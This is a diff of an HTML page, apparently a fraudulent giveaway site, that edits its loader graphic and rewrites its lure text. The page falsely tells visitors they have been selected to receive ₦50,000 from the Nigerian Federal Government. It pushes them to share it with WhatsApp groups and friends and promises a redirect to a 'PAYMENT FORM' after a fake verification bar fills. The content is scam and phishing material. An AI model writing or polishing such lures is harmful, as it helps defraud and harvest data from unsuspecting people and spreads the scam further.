--- a/buhari.html
+++ b/buhari.html
@@ -550,7 +550,7 @@ value="Airtel">Abia</option>
         </div>
         <div id="loader">
             <div>Please Wait ...</div>
-            <center><img src="https://i.sstatic.net/kOnzy.gif" alt="unicef" style="width: 35%;"></center>
+          <div class="spin"></div>
             <div id="num">0%</div>
         </div>
         <div id="info">
@@ -642,7 +642,7 @@ value="Airtel">Abia</option>
 
             <p class="tip"> Congratulations, Your account number<span id="getname"></span>.</p>
             <p class="tip">
-             Is among the shortlisted candidates to receive ₦50,000 Monthly Stipend from NDDC <br><br><span class="amount"> How to proceed: </span>  
+             Is among the selected Nigerian to receive ₦50,000 from Federal Government <br><br><span class="amount"> How to proceed: </span>  
             </p><br>
             <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp so that other parents can be aware of this (Click on the "SHARE" icon below).</p>
             <p class="tip">2. You will be redirected automatically to our "<b>PAYMENT FORM</b>" page after the GREEN verification bar is filled.</p>
